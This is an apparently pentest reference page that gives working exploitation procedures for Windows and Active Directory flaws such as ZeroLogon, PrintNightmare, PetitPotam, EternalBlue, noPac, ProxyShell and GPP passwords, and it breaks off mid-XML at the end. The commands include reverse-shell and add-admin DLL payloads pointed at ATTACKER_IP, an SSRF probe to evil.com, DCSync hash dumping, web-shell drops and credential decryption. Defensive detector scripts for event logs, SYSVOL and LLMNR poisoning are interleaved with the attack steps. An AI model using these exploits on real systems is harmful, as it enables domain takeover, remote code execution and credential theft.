Exploitation

Known Vulnerabilities

Critical Windows and Active Directory vulnerabilities commonly found in enterprise environments.

Danger

These exploits can cause service disruption or system instability. Always test in controlled environments and have rollback plans.

Prerequisites & Tool Installation

Many exploits on this page require third-party tools. Here's how to obtain them:

Essential Tools

Impacket - Python AD toolkit

pip install impacket

GitHub: fortra/impacket

CrackMapExec - Network pentesting

pipx install crackmapexec

GitHub: Porchetta-Industries/CrackMapExec

Certipy - AD CS exploitation

pip install certipy-ad

GitHub: ly4k/Certipy

Metasploit - Exploitation framework

apt install metasploit-framework

Pre-installed on Kali Linux

ZeroLogon (CVE-2020-1472)

A cryptographic flaw in the Netlogon protocol (AES-CFB8 with a zero IV) lets an unauthenticated attacker reset the machine account password of a Domain Controller and take it over. Patches released August 2020.

CVSS Score: 10.0 (Critical)

Impact: Full domain compromise without authentication

Affected: Windows Server 2008 R2 through 2019

Tool Installation

bash
# Clone the ZeroLogon checker/exploit
git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
pip install -r requirements.txt

# Alternative: dirkjanm's CVE-2020-1472
git clone https://github.com/dirkjanm/CVE-2020-1472.git

Check Vulnerability

bash
# Check if DC is vulnerable (SecuraBV scanner)
python zerologon_tester.py DC_NETBIOS_NAME DC_IP

# CrackMapExec module (built-in)
crackmapexec smb 192.168.1.100 -u '' -p '' -M zerologon

# Nmap script
nmap -p135,445 --script smb-vuln-cve-2020-1472 192.168.1.100

Exploit ZeroLogon

Warning

CAUTION: This exploit sets the DC machine account password to empty, which breaks AD replication and Kerberos authentication. Have a restoration plan ready.

bash
# Set DC password to empty (DANGEROUS - breaks replication!)
python cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP

# Dump hashes with empty password
secretsdump.py -no-pass -just-dc DC_NETBIOS_NAME\$@DC_IP

# Restore DC password (CRITICAL!)
# First, get the machine account hash from secretsdump output
secretsdump.py administrator@DC_IP -hashes :ADMIN_HASH

# Use restorepassword.py from dirkjanm's repo (usage: DOMAIN/DC_NAME@DC_NAME)
# Get the original hex password (plain_password_hex) from the secretsdump output
python restorepassword.py corp.local/DC_NETBIOS_NAME@DC_NETBIOS_NAME -target-ip DC_IP -hexpass ORIGINAL_HEX_PASSWORD

⚠️ Password Restoration Process

  1. Before exploiting, note the DC NetBIOS name exactly as shown in AD
  2. After secretsdump, look for DC_NAME$:plain_password_hex: in output
  3. Save this hex value - you'll need it to restore
  4. Run restorepassword.py immediately after obtaining admin access
  5. Verify restoration by checking DC replication status

Danger

ZeroLogon sets the DC machine account password to empty, breaking AD replication. Always restore immediately after exploitation or use safer post-exploit methods.

PrintNightmare (CVE-2021-1675/34527)

Remote code execution via the Print Spooler service. Works on DCs and workstations. Patches released July 2021.

CVSS Score: 8.8 (High)

Impact: Remote code execution as SYSTEM

Affected: All Windows versions with Print Spooler enabled

Tool Installation

bash
# cube0x0's PrintNightmare exploit (most reliable)
git clone https://github.com/cube0x0/CVE-2021-1675.git
cd CVE-2021-1675
pip install -r requirements.txt

# Note: Requires modified impacket for some versions
git clone https://github.com/cube0x0/impacket
cd impacket
python setup.py install

Check Vulnerability

bash
# Check if Print Spooler is running (must return MS-RPRN)
rpcdump.py @192.168.1.100 | grep -i spoolsv
rpcdump.py @192.168.1.100 | grep -i 'MS-RPRN'

# CrackMapExec module
crackmapexec smb 192.168.1.0/24 -u user -p pass -M spooler

# Nmap
nmap -p445 --script smb-enum-services 192.168.1.100

Exploit PrintNightmare

Step 1: Create a malicious DLL payload

bash
# Meterpreter reverse shell DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll

# Stageless reverse shell (more reliable)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll

# Add user DLL (create admin user)
msfvenom -p windows/adduser USER=hacker PASS=Hacker123! -f dll -o adduser.dll

Step 2: Host the DLL on an SMB share (target must be able to reach attacker)

bash
# Start SMB server (Impacket)
smbserver.py share $(pwd) -smb2support

# With authentication (if needed)
smbserver.py share $(pwd) -smb2support -username user -password pass

Step 3: Start listener (if using reverse shell)

bash
# Metasploit listener
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST ATTACKER_IP
set LPORT 4444
run

# Netcat listener (for stageless shell)
nc -lvnp 4444

Step 4: Execute the exploit

bash
# cube0x0's version (recommended)
python CVE-2021-1675.py corp.local/user:password@192.168.1.100 '\\ATTACKER_IP\share\evil.dll'

# Specify driver name (if default fails)
python CVE-2021-1675.py corp.local/user:password@192.168.1.100 '\\ATTACKER_IP\share\evil.dll' 'Microsoft XPS Document Writer v5'

Information

Troubleshooting: If the exploit fails, ensure: (1) SMB share is accessible from target, (2) Print Spooler is running, (3) Target hasn't been patched, (4) Try different driver names.

PetitPotam (CVE-2021-36942)

Coerces Windows hosts to authenticate to the attacker via MS-EFSRPC. Chain with NTLM relay for domain takeover.

CVSS Score: N/A (Authentication Coercion)

Impact: Force NTLM authentication from any Windows host

Best Used With: NTLM Relay to AD CS, LDAP, or SMB

Tool Installation

bash
# PetitPotam exploit
git clone https://github.com/topotam/PetitPotam.git
cd PetitPotam

# Dependencies (uses Impacket)
pip install impacket

Basic Usage

bash
# Unauthenticated coercion (works on unpatched systems)
python PetitPotam.py ATTACKER_IP TARGET_IP

# Authenticated (works even on patched systems)
python PetitPotam.py -d corp.local -u user -p password ATTACKER_IP TARGET_IP

# Using NTLM hash
python PetitPotam.py -d corp.local -u user -hashes :NTLM_HASH ATTACKER_IP TARGET_IP

Attack Chain: PetitPotam + AD CS (ESC8)

This is the most powerful use case: coerce the DC to authenticate, relay that authentication to the AD CS web enrollment endpoint, and obtain a certificate issued for the DC's machine account.

Prerequisites:

  • AD Certificate Services (AD CS) installed in domain
  • Web enrollment enabled on CA (certsrv endpoint)
  • EPA (Extended Protection for Authentication) not enforced

bash
# Step 1: Find AD CS servers
crackmapexec ldap DC_IP -u user -p pass -M adcs
certipy find -u user@corp.local -p password -dc-ip DC_IP

# Step 2: Start NTLM relay to AD CS (Terminal 1)
sudo ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Step 3: Trigger PetitPotam (Terminal 2)
python PetitPotam.py ATTACKER_IP DC_IP

# Step 4: Use obtained certificate to authenticate as DC
certipy auth -pfx dc.pfx -dc-ip DC_IP

# Step 5: DCSync with obtained hash
secretsdump.py -hashes :NTLM_HASH corp.local/DC_NAME\$@DC_IP

Tip

Alternative Coercion Methods: If PetitPotam is patched, try other coercion techniques: Coercer tool tests multiple methods (MS-RPRN, MS-EFSR, MS-FSRVP, etc.) - GitHub: p0dalirius/Coercer

EternalBlue (MS17-010)

SMBv1 remote code execution. Still found in legacy environments. Patches released March 2017.

CVSS Score: 8.1 (High)

Impact: Remote code execution as SYSTEM (no authentication)

Affected: Windows XP through Windows Server 2008 R2 (unpatched)

Notable: Used in WannaCry and NotPetya ransomware

Check Vulnerability

bash
# Nmap script (most reliable detection)
nmap -p445 --script smb-vuln-ms17-010 192.168.1.100
nmap -p445 --script smb-vuln-ms17-010 192.168.1.0/24

# CrackMapExec (doesn't require credentials)
crackmapexec smb 192.168.1.0/24 -u '' -p '' -M ms17-010

# Metasploit scanner
msfconsole -q
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
run

Exploit EternalBlue

Option 1: Metasploit (Most Reliable)

bash
# Metasploit EternalBlue exploit
msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST ATTACKER_IP
set LPORT 4444
exploit

# For 32-bit targets
set PAYLOAD windows/meterpreter/reverse_tcp

Option 2: Standalone Python Exploit

bash
# worawit's MS17-010 exploit collection
git clone https://github.com/worawit/MS17-010.git
cd MS17-010

# Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f raw -o shellcode.bin EXITFUNC=thread

# Merge shellcode with exploit
python shellcode_patcher.py shellcode.bin

# Run exploit (different scripts for different targets)
python eternalblue_exploit7.py 192.168.1.100 shellcode.bin  # Windows 7
python eternalblue_exploit8.py 192.168.1.100 shellcode.bin  # Windows 8/2012

Warning

EternalBlue can cause system instability or crashes. Have a plan if the target system becomes unresponsive. In production environments, use with caution.

sAMAccountName Spoofing (CVE-2021-42278/42287)

Exploit machine account name confusion to impersonate Domain Controller. Also known as "noPac". Patches released November 2021.

CVSS Score: 8.8 (High) - combined

Impact: Domain Admin from any domain user

Requires: Valid domain user credentials, ability to create machine accounts (default)

Tool Installation

bash
# noPac - automated exploit (recommended)
git clone https://github.com/Ridter/noPac.git
cd noPac
pip install -r requirements.txt

# Alternative: cube0x0's version
git clone https://github.com/cube0x0/noPac.git

Check Vulnerability

bash
# Check MAQ (Machine Account Quota) - default is 10
crackmapexec ldap DC_IP -u user -p password -M maq

# Manual LDAP query
ldapsearch -x -H ldap://DC_IP -D 'user@corp.local' -w 'password' -b 'DC=corp,DC=local' '(objectClass=domain)' ms-DS-MachineAccountQuota

Exploit noPac

Automated Exploitation:

bash
# Dump domain hashes (DCSync)
python noPac.py corp.local/user:password -dc-ip DC_IP -dc-host DC_NAME --impersonate administrator -dump

# Get interactive shell on DC
python noPac.py corp.local/user:password -dc-ip DC_IP -dc-host DC_NAME --impersonate administrator -shell

# Specify target user to impersonate
python noPac.py corp.local/user:password -dc-ip DC_IP -dc-host DC_NAME --impersonate 'Domain Admin'

Manual Exploitation (understanding the attack):

bash
# Step 1: Create a machine account (allowed by the default MachineAccountQuota of 10)
addcomputer.py -computer-name 'YOURPC$' -computer-pass 'Password123' -dc-ip DC_IP corp.local/user:password

# Step 2: Clear the SPNs on the machine account (they reference the old name and would block the rename)
addspn.py -u 'corp.local\YOURPC$' -p 'Password123' -c 'YOURPC$' --clear DC_IP

# Step 3: Rename the machine account to the DC's name WITHOUT the trailing '$'
# (CVE-2021-42278: the DC does not enforce the '$' suffix, so 'DC' does not collide with the real 'DC$')
renameMachine.py -current-name 'YOURPC$' -new-name 'DC' -dc-ip DC_IP corp.local/user:password

# Step 4: Request a TGT for the renamed account (getTGT.py saves it as DC.ccache)
getTGT.py -dc-ip DC_IP 'corp.local/DC:Password123'

# Step 5: Rename back, so the name 'DC' no longer exists when the TGT is used
renameMachine.py -current-name 'DC' -new-name 'YOURPC$' -dc-ip DC_IP corp.local/user:password

# Step 6: S4U2self with that TGT: the KDC cannot find 'DC', appends '$' (CVE-2021-42287)
# and issues a service ticket for the real DC$ with 'administrator' as the client
export KRB5CCNAME=DC.ccache
getST.py -spn cifs/DC.corp.local -impersonate administrator -dc-ip DC_IP 'corp.local/DC' -k -no-pass

# Step 7: Use the ticket (recent Impacket names the file after user, SPN and realm,
# e.g. administrator@cifs_DC.corp.local@CORP.LOCAL.ccache; use the name getST.py prints)
export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass DC.corp.local

Information

The noPac automated script handles all these steps. Manual exploitation helps understand the vulnerability for reporting and remediation guidance.
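From the defender's side, both ZeroLogon (above) and the noPac rename sequence leave recognisable traces in the Security log: ZeroLogon resets a DC's machine-account password with ANONYMOUS LOGON as the subject (event 4742 on the DC's computer account, and event 5829 when a vulnerable Netlogon secure channel is allowed), while noPac renames a computer account to a name without the trailing $ (event 4781). The following Python is an added example, not code from this page or from the noPac/ZeroLogon projects: the event dicts are constructed samples, and the EventData field names, the DC_ACCOUNTS set and the rule names are assumptions about a particular environment's log export.

```python
"""Flag ZeroLogon and noPac (sAMAccountName spoofing) artefacts in exported
Windows Security events.  The events below are CONSTRUCTED samples shaped
like the EventData of 4742 / 4781 / 5829; field names and the DC list are
assumptions for this demo, adjust them to your SIEM's schema."""

from dataclasses import dataclass
from typing import Dict, List, Optional

ANONYMOUS_SID = "S-1-5-7"            # well-known SID of ANONYMOUS LOGON
DC_ACCOUNTS = {"DC01$", "DC02$"}     # assumed: machine accounts of the domain's DCs


@dataclass
class Finding:
    rule: str
    event_id: int
    detail: str


def check_zerologon(ev: Dict) -> Optional[Finding]:
    """4742 on a DC computer account whose subject is ANONYMOUS LOGON is the
    classic ZeroLogon trace (the password reset runs over an unauthenticated
    Netlogon channel).  5829 marks any vulnerable Netlogon connection the DC
    still allows, i.e. exposure rather than proof of exploitation."""
    eid = ev.get("EventID")
    if eid == 4742:
        target = ev.get("TargetUserName", "")
        subj_sid = ev.get("SubjectUserSid", "")
        subj = ev.get("SubjectUserName", "").upper()
        if target in DC_ACCOUNTS and (subj_sid == ANONYMOUS_SID or subj == "ANONYMOUS LOGON"):
            return Finding("zerologon", 4742, f"{target} changed by ANONYMOUS LOGON")
    elif eid == 5829:
        who = ev.get("SamAccountName", "?")
        return Finding("netlogon-exposure", 5829,
                       f"vulnerable Netlogon secure channel allowed for {who}")
    return None


def check_nopac(ev: Dict) -> Optional[Finding]:
    """4781 renaming a computer account to a name WITHOUT the '$' suffix is the
    CVE-2021-42278 step; if that bare name is a DC's name it is the noPac chain."""
    if ev.get("EventID") != 4781:
        return None
    old = ev.get("OldTargetUserName", "")
    new = ev.get("NewTargetUserName", "")
    if old.endswith("$") and not new.endswith("$"):
        sev = "CRITICAL: matches a DC name" if new + "$" in DC_ACCOUNTS else "suspicious"
        return Finding("nopac", 4781, f"{old} -> {new} ({sev})")
    return None


def scan(events: List[Dict]) -> List[Finding]:
    """Run every rule over every event, preserving event order."""
    findings = []
    for ev in events:
        for rule in (check_zerologon, check_nopac):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed sample events (not real log data)
SAMPLE_EVENTS = [
    {"EventID": 4742, "SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON",
     "TargetUserName": "DC01$", "PasswordLastSet": "2020-09-15T10:12:03Z"},
    {"EventID": 4742, "SubjectUserSid": "S-1-5-21-1111111111-2222222222-3333333333-1105",
     "SubjectUserName": "svc_sccm", "TargetUserName": "WS042$"},   # benign change
    {"EventID": 4781, "SubjectUserName": "jdoe", "OldTargetUserName": "YOURPC$",
     "NewTargetUserName": "DC01"},                                  # noPac step 3
    {"EventID": 4781, "SubjectUserName": "jdoe", "OldTargetUserName": "DC01",
     "NewTargetUserName": "YOURPC$"},                               # step 5 rename back
    {"EventID": 5829, "SamAccountName": "LEGACY-NAS$"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.event_id}: {f.detail}")
```

The rename back in step 5 is deliberately not a second alert: the first rename already fired, and a 4781 whose old name lacks the $ only tells you the account had been renamed earlier. Correlating the 4781 pair with a 4768 (TGT request) for the bare name in between is the natural next refinement.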

ProxyLogon/ProxyShell (Exchange)

Exchange Server pre-auth RCE vulnerabilities. Often leads to domain compromise.

ProxyLogon: CVE-2021-26855, CVE-2021-27065

Patches: March 2021

CVSS: 9.8 (Critical)

ProxyShell: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207

Patches: April-May 2021

CVSS: 9.8 (Critical)

Tool Installation

bash
# ProxyLogon/ProxyShell exploit collection
git clone https://github.com/hausec/ProxyLogon.git
git clone https://github.com/ktecv2000/ProxyShell.git

# Exchange exploitation toolkit
pip install exchangelib

Check Vulnerability

bash
# ProxyLogon check - SSRF to autodiscover
curl -k 'https://exchange.corp.local/autodiscover/autodiscover.json?@evil.com/owa/&Email=autodiscover/autodiscover.json%3F@evil.com'

# Check Exchange version (exposed in headers)
curl -k -s https://exchange.corp.local/owa/ -I | grep 'X-OWA-Version'

# Nmap script
nmap -p443 --script http-vuln-cve2021-26855 exchange.corp.local

# Metasploit scanner
msfconsole -q
use auxiliary/scanner/http/exchange_proxylogon
set RHOSTS exchange.corp.local
run

Exploit ProxyShell

bash
# Metasploit ProxyShell RCE
msfconsole -q
use exploit/windows/http/exchange_proxyshell_rce
set RHOSTS exchange.corp.local
set EMAIL user@corp.local
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST ATTACKER_IP
exploit

# Standalone exploit (drop web shell)
python proxyshell_exploit.py -t https://exchange.corp.local -e user@corp.local

Information

Exchange servers are often highly privileged in AD environments. Compromising Exchange frequently leads to domain admin via Exchange trusted subsystem permissions or credential theft from mailboxes.

GPP Passwords (MS14-025)

Group Policy Preferences stored credentials in SYSVOL encrypted with AES-256 under a single fixed key, and Microsoft published that key in its MS-GPPREF documentation, so anyone who can read SYSVOL (every domain user) can decrypt them.

Affected Files: Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Printers.xml, Drives.xml

Location: \\DOMAIN\SYSVOL\DOMAIN\Policies\

Note: Patched in 2014, but legacy GPPs may still contain passwords

Manual Search

bash
# Search SYSVOL for cpassword attribute
findstr /S /I cpassword \\corp.local\sysvol\corp.local\policies\*.xml

# PowerShell search
Get-ChildItem -Path '\\corp.local\SYSVOL\corp.local\Policies' -Recurse -Include *.xml | Select-String -Pattern 'cpassword'

# Linux - mount and search
mount -t cifs //DC_IP/SYSVOL /mnt/sysvol -o user=user,password=pass
grep -ri 'cpassword' /mnt/sysvol/

Automated Tools

bash
# CrackMapExec module
crackmapexec smb DC_IP -u user -p pass -M gpp_password

# Metasploit module
msfconsole -q
use auxiliary/scanner/smb/smb_enum_gpp
set RHOSTS DC_IP
set SMBUser user
set SMBPass password
run

# Get-GPPPassword PowerShell script (PowerSploit)
Import-Module .\Get-GPPPassword.ps1
Get-GPPPassword

Decrypt GPP Password

bash
# Using gpp-decrypt (Kali built-in)
gpp-decrypt "ENCRYPTED_CPASSWORD_HERE"

# Example:
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

# Python alternative (needs pycryptodome: pip install pycryptodome)
python -c "
import base64
from Crypto.Cipher import AES
# Fixed AES-256 key published by Microsoft (MS-GPPREF)
key = bytes.fromhex('4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b')
cpass = 'ENCRYPTED_CPASSWORD_HERE'
cpass += '=' * (-len(cpass) % 4)          # cpassword is stored without base64 padding
pt = AES.new(key, AES.MODE_CBC, b'\x00' * 16).decrypt(base64.b64decode(cpass))
pt = pt[:-pt[-1]]                         # strip PKCS#7 padding
print(pt.decode('utf-16-le'))             # the plaintext is UTF-16LE, not UTF-8
"

Tip

Even if the patch is applied, old Group Policy Preferences may still contain credentials. Always check SYSVOL during assessments.
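A single cpassword is easy to decrypt by hand; what an assessment or a SYSVOL clean-up actually needs is a scan of every GPP XML type listed above, reporting which account each leaked value belongs to. The following Python is an added example, not code from this page or from any of the tools it lists. The Groups.xml text is a constructed sample (its cpassword is the well-known public example value used above), the attribute names it reads (userName, accountName, runAs) are the ones the listed file types use, and decryption relies on pycryptodome as the page's own snippet does, imported lazily so the XML scan itself runs without it.

```python
"""Audit a SYSVOL copy (or a mounted share) for Group Policy Preference
cpassword values.  SAMPLE_GROUPS_XML is CONSTRUCTED; the only real constant is
the AES-256 key Microsoft published in MS-GPPREF.  Decryption needs
pycryptodome (pip install pycryptodome)."""

import base64
import os
import xml.etree.ElementTree as ET
from typing import Iterator, List, Tuple

GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}


def pad_b64(value: str) -> str:
    """GPP strips the base64 '=' padding; restore it so b64decode accepts it."""
    return value + "=" * (-len(value) % 4)


def decrypt_cpassword(cpassword: str) -> str:
    from Crypto.Cipher import AES  # lazy: scanning works even without pycryptodome
    raw = AES.new(GPP_KEY, AES.MODE_CBC, b"\x00" * 16).decrypt(
        base64.b64decode(pad_b64(cpassword)))
    raw = raw[:-raw[-1]]              # strip PKCS#7 padding
    return raw.decode("utf-16-le")    # GPP stores the password as UTF-16LE


def find_cpasswords(xml_text: str, source: str = "<memory>") -> Iterator[Tuple[str, str, str]]:
    """Yield (source file, account, cpassword) for every element carrying a
    cpassword attribute.  Each file type nests its Properties element
    differently, so every element is inspected rather than one tag name; the
    account sits in userName (Groups/Drives/DataSources), accountName
    (Services) or runAs (ScheduledTasks)."""
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        cp = elem.get("cpassword")
        if cp:
            who = elem.get("userName") or elem.get("accountName") or elem.get("runAs") or "?"
            yield source, who, cp


def scan_sysvol(path: str) -> List[Tuple[str, str, str]]:
    """Walk a SYSVOL tree (e.g. /mnt/sysvol after the mount above) and collect hits."""
    hits = []
    for dirpath, _, files in os.walk(path):
        for name in files:
            if name in GPP_FILES:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    hits.extend(find_cpasswords(fh.read(), full))
    return hits


# Constructed Groups.xml shaped like a real GPP file (clsid attributes omitted)
SAMPLE_GROUPS_XML = """<Groups>
  <User name="svc_backup" image="2" changed="2018-07-18 20:46:06">
    <Properties action="U"
      cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
      userName="corp.local\\svc_backup" newName="" fullName="" description=""/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for src, who, cp in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        try:
            shown = decrypt_cpassword(cp)
        except ImportError:
            shown = "(install pycryptodome to decrypt) " + cp
        print(f"{src}: {who} -> {shown}")
```

Point scan_sysvol() at the mount from the "Linux - mount and search" snippet; every hit is a credential to rotate and a preference item to delete, since removing the cpassword attribute alone still leaves the old XML in SYSVOL's version history on backup media.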

LLMNR/NBT-NS Poisoning (Not patched)

Protocol weakness - not a CVE but extremely common in enterprise networks. Can be mitigated via GPO but rarely is.

Protocols: LLMNR (UDP 5355), NBT-NS (UDP 137), mDNS (UDP 5353)

Impact: Capture NTLMv2 hashes, relay authentication

Mitigation: Disable via GPO, but requires testing and rarely done

bash
# See Credential Attacks page for full details
sudo responder -I eth0 -dwPv

# Passive mode (listening only, no poisoning)
sudo responder -I eth0 -A

For comprehensive LLMNR/NBT-NS techniques, see the Credential Attacks page.
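The protocol weakness is simple to detect on the wire: a host may legitimately answer an LLMNR query only for its own name, so a poisoner such as Responder stands out because one source address answers for many different names, including canary names that do not exist. The following Python is an added example, not code from this page or from Responder: it parses LLMNR responses (DNS wire format on UDP 5355, RFC 4795), tallies answered names per source, and flags sources that answer for several names or for a canary. All packets are constructed in-line with build_llmnr_response(); the threshold and the canary name are assumptions for the demo, and a real deployment would feed it packets captured from a monitoring port.

```python
"""Spot LLMNR poisoning from captured UDP/5355 responses.  SAMPLE_TRAFFIC is
CONSTRUCTED with build_llmnr_response(); no real capture is involved."""

import struct
from collections import defaultdict
from typing import Dict, List, Set, Tuple


def _encode_name(name: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"


def _decode_name(buf: bytes, off: int) -> Tuple[str, int]:
    """Decode a DNS-style name, following a compression pointer if present.
    Returns (name, offset just past the name in the original stream)."""
    labels, jumped, end = [], False, off
    while True:
        ln = buf[off]
        if ln & 0xC0 == 0xC0:                       # compression pointer
            if not jumped:
                end = off + 2
            off = struct.unpack("!H", buf[off:off + 2])[0] & 0x3FFF
            jumped = True
            continue
        off += 1
        if ln == 0:
            break
        labels.append(buf[off:off + ln].decode())
        off += ln
    return ".".join(labels), (end if jumped else off)


def build_llmnr_response(txid: int, name: str, ip: str) -> bytes:
    """Constructed LLMNR answer: QR=1, one question, one A record (TTL 30)."""
    hdr = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    question = _encode_name(name) + struct.pack("!HH", 1, 1)   # QTYPE A, QCLASS IN
    rdata = bytes(int(o) for o in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + rdata
    return hdr + question + answer


def parse_llmnr(pkt: bytes) -> Dict:
    """Return id, response flag, question names and (name, ipv4) answers."""
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        qname, off = _decode_name(pkt, off)
        off += 4                                    # skip QTYPE + QCLASS
        questions.append(qname)
    for _ in range(an):
        aname, off = _decode_name(pkt, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((aname, ".".join(str(b) for b in rdata)))
    return {"id": txid, "response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


class LlmnrMonitor:
    """Aggregate responses by source IP and flag hosts answering for many names."""

    def __init__(self, canaries: Set[str] = frozenset()):
        self.names_by_src: Dict[str, Set[str]] = defaultdict(set)
        self.canaries = {c.lower() for c in canaries}
        self.canary_hits: List[Tuple[str, str]] = []

    def observe(self, src_ip: str, pkt: bytes) -> None:
        msg = parse_llmnr(pkt)
        if not msg["response"]:
            return
        for name, _ in msg["answers"]:
            self.names_by_src[src_ip].add(name.lower())
            if name.lower() in self.canaries:
                self.canary_hits.append((src_ip, name))

    def poisoners(self, threshold: int = 3) -> List[str]:
        return sorted(ip for ip, names in self.names_by_src.items() if len(names) >= threshold)


# Constructed traffic: a legitimate host answering for itself, and a
# Responder-style host answering every name, canary included
SAMPLE_TRAFFIC = [
    ("10.0.0.25", build_llmnr_response(0x1001, "FILESRV01", "10.0.0.25")),
    ("10.0.0.99", build_llmnr_response(0x1002, "fileshare", "10.0.0.99")),
    ("10.0.0.99", build_llmnr_response(0x1003, "printsrv", "10.0.0.99")),
    ("10.0.0.99", build_llmnr_response(0x1004, "wpad-canary", "10.0.0.99")),
]


def run(traffic=SAMPLE_TRAFFIC, canaries=("wpad-canary",)):
    mon = LlmnrMonitor(set(canaries))
    for src, pkt in traffic:
        mon.observe(src, pkt)
    return mon.poisoners(), mon.canary_hits


if __name__ == "__main__":
    ips, hits = run()
    print("poisoners:", ips, "canary hits:", hits)
```

The canary check is the cheaper of the two signals: a scheduled job that resolves a name nobody owns and alerts on any answer needs no threshold tuning, while the per-source name count catches a poisoner that ignores the canary.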

Additional High-Impact CVEs

CVE            | Name                   | Impact                                | Resource
---------------|------------------------|---------------------------------------|------------------------
CVE-2022-26923 | Certifried             | Domain user to Domain Admin via AD CS | Certipy
CVE-2022-33679 | Kerberos RC4 Downgrade | Capture AS-REP for any user           | PoC
CVE-2022-37958 | SPNEGO NEGOEX RCE      | RCE via SMB/RDP (pre-auth)            | Metasploit module
CVE-2023-23397 | Outlook NTLM Leak      | Capture NTLM via calendar invite      | PoC
CVE-2024-26198 | Exchange OWA RCE       | Pre-auth RCE on Exchange              | Check vendor advisories

Vulnerability Scanning

Use these commands to quickly scan for multiple vulnerabilities across a network.

Nmap Vulnerability Scripts

bash
# All vulnerability scripts (comprehensive but slow)
nmap -p- --script vuln 192.168.1.100

# Common Windows SMB vulnerabilities
nmap -p445 --script 'smb-vuln*' 192.168.1.0/24

# Specific high-priority checks
nmap -p445 --script smb-vuln-ms17-010,smb-vuln-cve-2020-0796 192.168.1.0/24

# RDP vulnerabilities (BlueKeep etc)
nmap -p3389 --script 'rdp-vuln*' 192.168.1.0/24

# All common Windows ports
nmap -p135,139,445,3389,5985,5986 --script vuln 192.168.1.100
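Across a /24 the text output of these scripts is awkward to triage, and a grep for "VULNERABLE" also matches "NOT VULNERABLE". The following Python is an added example, not code from this page or from Nmap: it reads an nmap -oX report and lists (host, script, state) only for hosts whose script result reports a vulnerable state. The XML fragment is a constructed sample shaped like the output of Nmap's vulns library (a table keyed by CVE with a state elem); that layout is an assumption, so the parser falls back to the script's output attribute for scripts that emit no structured table.

```python
"""Triage nmap -oX output from smb-vuln* / rdp-vuln* scripts.  SAMPLE_NMAP_XML
is CONSTRUCTED; the <table key="CVE-..."><elem key="state"> layout is an
assumption about Nmap's vulns-library output, hence the text fallback."""

import xml.etree.ElementTree as ET
from typing import List, Tuple


def _states_from_script(script: ET.Element) -> List[str]:
    """Prefer structured state elems; otherwise fall back to the output text,
    taking care not to count 'NOT VULNERABLE' as a hit."""
    states = [e.text.strip() for t in script.iter("table") for e in t.iter("elem")
              if e.get("key") == "state" and e.text]
    if states:
        return states
    out = (script.get("output") or "").upper()
    if "VULNERABLE" in out and "NOT VULNERABLE" not in out:
        return ["VULNERABLE"]
    return []


def parse_nmap_vulns(xml_text: str) -> List[Tuple[str, str, str]]:
    """Return (ipv4, script id, state) for every vulnerable or likely-vulnerable result."""
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = next((a.get("addr") for a in host.iter("address")
                     if a.get("addrtype") == "ipv4"), "?")
        for script in host.iter("script"):          # hostscript and port scripts alike
            for state in _states_from_script(script):
                up = state.upper()
                if up.startswith("VULNERABLE") or up == "LIKELY VULNERABLE":
                    findings.append((addr, script.get("id", "?"), state))
    return findings


# Constructed report: one vulnerable host, one patched host, one unstructured script
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -p445 --script smb-vuln* 192.168.1.0/24">
  <host><address addr="192.168.1.100" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)">
        <table key="CVE-2017-0143"><elem key="state">VULNERABLE</elem></table>
      </script>
      <script id="smb-vuln-ms10-054" output="false"/>
    </hostscript>
  </host>
  <host><address addr="192.168.1.101" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE">
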